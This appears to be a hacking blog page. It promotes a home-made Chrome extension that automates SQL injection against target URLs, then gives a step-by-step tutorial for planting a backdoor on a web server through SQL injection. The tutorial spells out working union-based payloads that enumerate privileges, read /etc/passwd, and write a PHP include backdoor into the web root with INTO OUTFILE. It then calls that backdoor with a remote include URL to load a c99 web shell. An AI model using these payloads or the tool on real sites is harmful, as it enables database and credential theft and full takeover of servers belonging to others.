A powerful chrome extension sql injector made by me.

Download Here

SQL-Injector

A chrome extension for sql injection using Union Based and Error Based

How To Install:

go to chrome://extension then drag and drop the sql injector folder to open it go to the options of the chrome extension.

How To Use:

To use this tool simply put your target url in the url textbox

Put '_INJECTHERE_' (without quotes) where the tool will inject.

Example:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_INJECTHERE_

Click start button and it will start scanning if its vulnerable or not

First the tool will check if the page is changing every visit.

And if it is, you need to take a piece of text that is in normal page.

Example:

website.com/page.php?id=19

Costs: 5 pesos only!

website.com/page.php?id=19'

Costs: only!

You see that the phrase '5 pesos' text disappears.

So you will put that phrase in normalPageKeyword and click start again.

Then after that, the tool will check if there's difference between the normal page and the errored page (the url with quote id=19')

And if normal page is the same as error page, then maybe its not vulnerable so you gotta find another target url.

Then if its not the same as error page, then the tool will now try to get the right comment

There are different types of comment depending on sql syntax:

'--+

--

#

)--+

')--+

"--+

etc..

If the tool cannot find the right comment, you may need to get the right comment by yourself and put it in the comment text box

For example the right comment is " '--+ " then you need to put " '_PAYLOAD--+ " in the comment textbox then click start again

Then the tool will start trying to get the vulnerable columns

it will try to use order by and group by method.

if the tool can't then you gotta count it by yourself and put it in numberOfColumns textbox.

Then the tool will start trying to get the injectable columns

if the tool can't then you gotta get it by yourself and put it in injectableColumn textbox.

Now if you have the comment type, number of columns and injectable columns.

You can now start gathering informations.

First lets try clicking getting version, user and currentDB

After that click [GET] button in database panel.

It will dump the database names, if you already have the database name you can put it in addDatabase textbox then click '>' button

Then select the database you want then click [GET] in the table panel to get the tables.

Same as the columns.

After that you will now dump the datas

You can select multiple columns that you want to dump

for example:

you choosed username column and password column

it will be username,0x3a,passwword

the 0x3a is ':' to seperate the username and password

result: admin:admin123,test1:testing123,z3r:z3r19

SQL Injection Uploading shell using root file privileges 70% Noob

!! FOR EDUCATIONAL PURPOSES ONLY  !!

I Introduction
So today i'm gonna teach you how to upload shell using SQL Injection

II Getting User
So first, get the user using
user()
Or
(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)

www.website.com/news.php?id=19' and false union select 1,user(),3,4,5,6,7,8,9--+

www.website.com/news.php?id=19' and false union select 1,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8,9--+

if the user is root or the user privilleges is Y or Yes then you're good go.

III Getting the Full Path Disclosure
I've written a tutorial how to get the Full Path Disclosure here.

Note : that if you can't get the Full Path Disclosure, there's no way you can upload your shell if you don't know where to save your backdoor shell.

Tips: Getting Full Path Disclosure

for some tips if you really want to know the FPD, try reading the server's "/etc/passwd" using load_file().

www.website.com/news.php?id=19' and false union select 1,load_file("/etc/passwd"),3,4,5,6,7,8,9--+

or if you still can't try guessing the FPD. The commons are "/var/www/" ,"/var/www/sitename" and etc..

to make sure that they're correct try "/var/www/index.php" and visit www.website.com/index.php then check if the source code is similar or the same.

IV Uploading the shell
Now that we have the full path disclosure, we can now try uploading the shell. We'll gonna use this script for our backdoor initiator:

<?php include $_GET["inc"];?>

www.website.com/news.php?id=19' and false union select 1,'<?php include($_GET["inc"]);?>',3,4,5,6,7,8,9 into outfile '/var/www/shell.php'--+
So once we visit that url, we will now go here:

www.website.com/shell.php?inc=http://examplebackdoorwebsite.com/c99.txt

And wollah! You have successfully inserted a php backdoor in the website!

if its 404 not found, then maybe the directory is not writable. You gotta find some directories that is writable.
The common writable directories are:
/uploads/
/images/
/videos/
or something like that.

V Goodbye
Hope you learned something with my tutorial! I guess it's your job to enhance and explore. Good luck and have fun hacking!!